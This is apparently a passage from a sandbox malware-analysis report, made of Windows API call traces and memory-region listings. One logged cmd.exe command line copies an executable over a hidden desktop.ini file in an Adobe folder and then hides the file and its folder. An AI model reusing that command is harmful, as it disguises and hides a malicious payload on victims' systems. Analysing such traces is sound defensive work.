GetFileType (hFile=0x4c) returned 0x1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] GetFileType (hFile=0x4c) returned 0x1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] GetFileType (hFile=0x4c) returned 0x1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] GetFileType (hFile=0x4c) returned 0x1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] GetFileType (hFile=0x4c) returned 0x1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, lpOverlapped=0x0) returned 1 [0146.129] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.129] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.129] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.129] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] GetFileType (hFile=0x4c) returned 0x1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] GetFileType (hFile=0x4c) returned 0x1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] GetFileType (hFile=0x4c) returned 0x1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] GetFileType (hFile=0x4c) returned 0x1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] GetFileType (hFile=0x4c) returned 0x1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] GetFileType (hFile=0x4c) returned 0x1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] GetFileType (hFile=0x4c) returned 0x1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] GetFileType (hFile=0x4c) returned 0x1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, lpOverlapped=0x0) returned 1 [0146.130] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.130] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.130] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.130] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] GetFileType (hFile=0x4c) returned 0x1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] GetFileType (hFile=0x4c) returned 0x1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] GetFileType (hFile=0x4c) returned 0x1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] GetFileType (hFile=0x4c) returned 0x1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] GetFileType (hFile=0x4c) returned 0x1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] GetFileType (hFile=0x4c) returned 0x1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] GetFileType (hFile=0x4c) returned 0x1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] GetFileType (hFile=0x4c) returned 0x1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, lpOverlapped=0x0) returned 1 [0146.132] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.132] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.132] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.132] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] GetFileType (hFile=0x4c) returned 0x1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] GetFileType (hFile=0x4c) returned 0x1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] GetFileType (hFile=0x4c) returned 0x1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] GetFileType (hFile=0x4c) returned 0x1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] GetFileType (hFile=0x4c) returned 0x1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] GetFileType (hFile=0x4c) returned 0x1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] GetFileType (hFile=0x4c) returned 0x1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] GetFileType (hFile=0x4c) returned 0x1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, lpOverlapped=0x0) returned 1 [0146.133] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.133] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.133] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.133] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] GetFileType (hFile=0x4c) returned 0x1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] GetFileType (hFile=0x4c) returned 0x1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] GetFileType (hFile=0x4c) returned 0x1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] GetFileType (hFile=0x4c) returned 0x1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] GetFileType (hFile=0x4c) returned 0x1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.133] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.133] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.134] GetFileType (hFile=0x4c) returned 0x1 [0146.134] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.134] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.134] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.134] GetFileType (hFile=0x4c) returned 0x1 [0146.134] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.134] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.134] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.134] GetFileType (hFile=0x4c) returned 0x1 [0146.134] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.134] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, lpOverlapped=0x0) returned 1 [0146.134] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.134] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.134] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.134] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x32, lpOverlapped=0x0) returned 1 [0146.134] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.134] GetFileType (hFile=0x4c) returned 0x1 [0146.134] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.134] GetFileType (hFile=0x4c) returned 0x1 [0146.134] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.134] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x32, lpOverlapped=0x0) returned 1 [0146.134] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.134] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.134] _close (_FileHandle=4) returned 0 [0146.134] FindNextFileW (in: hFindFile=0x3a0ec8, lpFindFileData=0x1cf324 | out: lpFindFileData=0x1cf324) returned 0 [0146.135] GetLastError () returned 0x12 [0146.135] FindClose (in: hFindFile=0x3a0ec8 | out: hFindFile=0x3a0ec8) returned 1 [0146.135] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0146.338] _close (_FileHandle=3) returned 0 [0146.338] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.338] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0146.339] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.339] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0146.339] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.339] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0146.339] SetConsoleInputExeNameW () returned 0x1 [0146.339] GetConsoleOutputCP () returned 0x1b5 [0146.339] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.339] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.339] exit (_Code=0) Process: id = "203" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e00" os_pid = "0xac8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17715 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17716 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17717 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17718 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 17719 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17720 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17721 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17722 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17723 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 17724 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17797 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17798 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17799 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17800 start_va = 0xf0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 17801 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 17802 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 17803 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17804 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17805 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17806 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17807 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17808 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17809 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17810 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17811 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 17812 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17813 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 17814 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 17815 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 17816 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 17817 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 17818 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 17819 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 17820 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 17884 start_va = 0x1390000 end_va = 0x165efff entry_point = 0x1390000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 263 os_tid = 0xa94 [0146.155] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f8ac | out: 